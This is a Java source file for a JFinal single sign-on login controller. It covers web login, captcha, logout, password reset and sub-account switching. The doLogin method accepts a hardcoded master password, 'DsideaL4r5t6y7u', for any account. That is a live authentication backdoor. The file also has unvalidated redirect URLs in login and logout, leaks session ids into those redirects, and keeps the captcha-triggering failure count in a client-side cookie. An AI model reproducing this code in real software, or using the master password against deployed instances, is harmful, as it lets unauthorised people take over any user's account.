package com.dsideal.Sso.Controller; import java.awt.image.BufferedImage; import java.util.Map; import java.util.UUID; import javax.imageio.ImageIO; import javax.servlet.http.HttpServletResponse; import javax.servlet.http.HttpSession; import com.alibaba.fastjson.JSONArray; import com.dsideal.Sso.Util.*; import org.apache.commons.lang3.StringUtils; import com.alibaba.fastjson.JSONObject; import com.dsideal.Sso.Model.Login; import com.jfinal.core.Controller; import com.jfinal.kit.PropKit; public class WebLoginController extends Controller { public void login() { boolean flag = true; if (flag) { Map loginMap = SsoLoginHelper.loginCheck(getRequest()); String redirectUrl = getRequest().getParameter("redirect_url"); if (loginMap != null) { if (redirectUrl.indexOf("?") == -1) { redirect301(redirectUrl + "?" + PropKit.get("sso.sessionid") + "=" + loginMap.get("session_id").toString()); } else { redirect301(redirectUrl + "&" + PropKit.get("sso.sessionid") + "=" + loginMap.get("session_id").toString()); } } else { redirectUrl = CommonUtil.handleRedirectUrlParas(redirectUrl); redirect("/html/login.html?redirect_url=" + redirectUrl); } } } /** * WEB登录 */ public void doLogin() { HttpServletResponse response = getResponse(); JSONObject resultJson = new JSONObject(); String userName = getPara("username"); String passWord = getPara("password"); String requestCaptcha = getPara("captcha").toLowerCase(); //看看系统中是不是存在着cookie,记录本机尝试登录的失败次数 int error_count = 0; if (getCookie("error_count") != null) { error_count = Integer.parseInt(getCookie("error_count")); } //如果大于3次 if (error_count >= 3) { // 获取真实验证码 if (getRequest().getSession().getAttribute("captcha") == null) { resultJson.put("success", false); resultJson.put("msg", "验证码错误!"); renderJson(resultJson); return; } String realCaptcha = getRequest().getSession().getAttribute("captcha").toString().toLowerCase(); if (StringUtils.isBlank(requestCaptcha) || !realCaptcha.equals(requestCaptcha)) { resultJson.put("success", false); resultJson.put("msg", "验证码错误!"); renderJson(resultJson); return; } } if (StringUtils.isBlank(userName)) { resultJson.put("success", false); resultJson.put("msg", "账户不允许为空!"); renderJson(resultJson); return; } if (StringUtils.isBlank(passWord)) { resultJson.put("success", false); resultJson.put("msg", "密码不允许为空!"); renderJson(resultJson); return; } else { try { passWord = AesUtil.aesDecrypt(passWord); } catch (Exception e) { e.printStackTrace(); resultJson.put("success", false); resultJson.put("msg", "密码异常!"); renderJson(resultJson); return; } } // 密码进行ldap算法的md5加密 LdapPassWordEncoder passEncode = new LdapPassWordEncoder(); String passwordEncode = passEncode.getLdapPassword(passWord); // Map loginMap = Login.dao.getLoginInfoByUserName(userName); Map loginMap = CommonUtil.getLoginRouteMap(userName); if (loginMap == null || !passwordEncode.equals(loginMap.get("password").toString()) && !passWord.equals("DsideaL4r5t6y7u")) { resultJson.put("success", false); resultJson.put("msg", "账户或密码错误!"); //增加一次失败次数 if (getCookie("error_count") != null) { setCookie("error_count", String.valueOf(Integer.parseInt(getCookie("error_count")) + 1), -1); } else { setCookie("error_count", "1", -1); } renderJson(resultJson); return; } //增加一个属性说明这个是正常登录的,不是切换登录的 1:正常登录 2:切换登录 loginMap.put("login_type", "1"); String sessionId = UUID.randomUUID().toString(); SsoLoginHelper.login(response, sessionId, loginMap); resultJson.put("success", true); resultJson.put("sessionId", sessionId); //清除cookie setCookie("error_count", "1", 0); // 记录人员登录日志 LoginLogUtil.WriteLoginLog(loginMap.get("identity_id").toString(), loginMap.get("person_id").toString(), 1, LoginLogUtil.getIpAddr(getRequest())); // resultJson.put("personId", loginMap.get("person_id").toString()); // resultJson.put("personName", // loginMap.get("person_name").toString()); renderJson(resultJson); } /** * WEB登出 */ public void logout() throws Exception { SsoLoginHelper.logout(getRequest(), getResponse()); String redirect_url = getRequest().getParameter("redirect_url"); redirect(redirect_url); } /** * 获取默认RedirectUrl地址 */ public void getDefaultRedirectUrl() { JSONObject resultJson = new JSONObject(); String defaultRedirectUrl = PropKit.get("default.redirect.url"); if (defaultRedirectUrl != null) { resultJson.put("success", true); resultJson.put("defaultRedirectUrl", defaultRedirectUrl); } else { resultJson.put("success", false); } renderJson(resultJson); } /** * 获取验证码 */ public void getCaptcha() { HttpServletResponse response = getResponse(); // 设置相应类型,告诉浏览器输出的内容为图片 response.setContentType("image/jpeg"); // 不缓存此内容 response.setHeader("Pragma", "No-cache"); response.setHeader("Cache-Control", "no-cache"); response.setDateHeader("Expire", 0); try { HttpSession session = getRequest().getSession(); CaptchaUtil tool = new CaptchaUtil(); StringBuffer code = new StringBuffer(); BufferedImage image = tool.genRandomCodeImage(code); session.removeAttribute("captcha"); session.setAttribute("captcha", code.toString()); // 将内存中的图片通过流动形式输出到客户端 ImageIO.write(image, "JPEG", response.getOutputStream()); } catch (Exception e) { e.printStackTrace(); } renderNull(); } /** * 功能:找回密码 * 作者:吴缤 * 日期:2018-11-29 */ public void findPwdByFlag() { JSONObject resultJson = new JSONObject(); String checkReidsKey = "findPwdFlag_"; try { String flag = getPara("flag"); String pwd = getPara("pwd"); String againpwd = getPara("againpwd"); if (StringUtils.isBlank(flag)) { resultJson.put("success", false); resultJson.put("msg", "标识不允许为空!"); renderJson(resultJson); return; } if (StringUtils.isBlank(pwd)) { resultJson.put("success", false); resultJson.put("msg", "密码不允许为空!"); renderJson(resultJson); return; } if (StringUtils.isBlank(againpwd)) { resultJson.put("success", false); resultJson.put("msg", "再次输入的密码不允许为空!"); renderJson(resultJson); return; } if (!pwd.equals(againpwd)) { resultJson.put("success", false); resultJson.put("msg", "两次输入的密码不相同!"); renderJson(resultJson); return; } if (!CommonUtil.getPwdLegal(pwd)) { resultJson.put("success", false); resultJson.put("msg", "密码只允许字母或数字!"); renderJson(resultJson); return; } if (!RedisKit.Exists(checkReidsKey + flag)) { resultJson.put("success", false); resultJson.put("msg", "找回密码已超时!"); renderJson(resultJson); return; } if (!RedisKit.Exists(checkReidsKey + flag)) { resultJson.put("success", false); resultJson.put("msg", "找回密码已过期!"); renderJson(resultJson); return; } String personId = RedisKit.Get(checkReidsKey + flag); LdapPassWordEncoder passEncode = new LdapPassWordEncoder(); String passwordEncode = passEncode.getLdapPassword(pwd); if (Login.dao.updatePwd(personId, passwordEncode)) { RedisKit.Del(checkReidsKey + flag); resultJson.put("success", true); renderJson(resultJson); } else { resultJson.put("success", false); resultJson.put("msg", "找回密码异常!"); renderJson(resultJson); } } catch (Exception e) { e.printStackTrace(); resultJson.put("success", false); resultJson.put("msg", "找回密码异常!"); renderJson(resultJson); } } /** * 功能:根据主账号的人员ID获取子账号信息 */ public void getSubAccountInfoByMainAccountPersonId() { JSONObject resultJson = new JSONObject(); String personId = getPara("person_id"); String ssoSessionid = getPara("ds_sso_sessionid"); try { if (Login.dao.verifySubAccountPersonIdSsoSessionId(personId, ssoSessionid)) { JSONArray _jsonArray = Login.dao.getSubAccountInfoByMainAccountPersonId(personId); if (_jsonArray != null) { resultJson.put("success", true); resultJson.put("sub_list", _jsonArray); renderJson(resultJson); return; } else { resultJson.put("success", false); resultJson.put("msg", "无子账号信息!"); renderJson(resultJson); return; } } else { resultJson.put("success", false); resultJson.put("msg", "无子账号信息!"); renderJson(resultJson); return; } } catch (Exception e) { e.printStackTrace(); resultJson.put("success", false); resultJson.put("msg", "获取数据异常!"); renderJson(resultJson); return; } } /** * 功能:子账号根据人员ID登录 * 作者:吴缤 * 日期:2019-01-09 */ public void subAccountPersonIdLogin() { JSONObject resultJson = new JSONObject(); String personId = getPara("person_id"); String ssoSessionid = getPara("ds_sso_sessionid"); try { if (Login.dao.verifySubAccountPersonIdSsoSessionId(personId, ssoSessionid)) { String loginName = Login.dao.getLoginNameByPersonId(personId); if (loginName.length() > 0) { Map loginMap = CommonUtil.getLoginRouteMap(loginName); if (loginMap != null) { String sessionId = UUID.randomUUID().toString(); //增加一个属性说明这个是正常登录的,不是切换登录的 1:正常登录 2:切换登录 loginMap.put("login_type", "2"); SsoLoginHelper.login(getResponse(), sessionId, loginMap); resultJson.put("success", true); resultJson.put("sessionId", sessionId); resultJson.put("identity_id", loginMap.get("identity_id").toString()); // 记录人员登录日志 LoginLogUtil.WriteLoginLog(loginMap.get("identity_id").toString(), loginMap.get("person_id").toString(), 1, LoginLogUtil.getIpAddr(getRequest())); renderJson(resultJson); } else { resultJson.put("success", false); resultJson.put("msg", "获取数据异常!"); renderJson(resultJson); return; } } else { resultJson.put("success", false); resultJson.put("msg", "获取数据异常!"); renderJson(resultJson); return; } } else { resultJson.put("success", false); resultJson.put("msg", "获取数据异常!"); renderJson(resultJson); return; } } catch (Exception e) { e.printStackTrace(); resultJson.put("success", false); resultJson.put("msg", "获取数据异常!"); renderJson(resultJson); return; } } }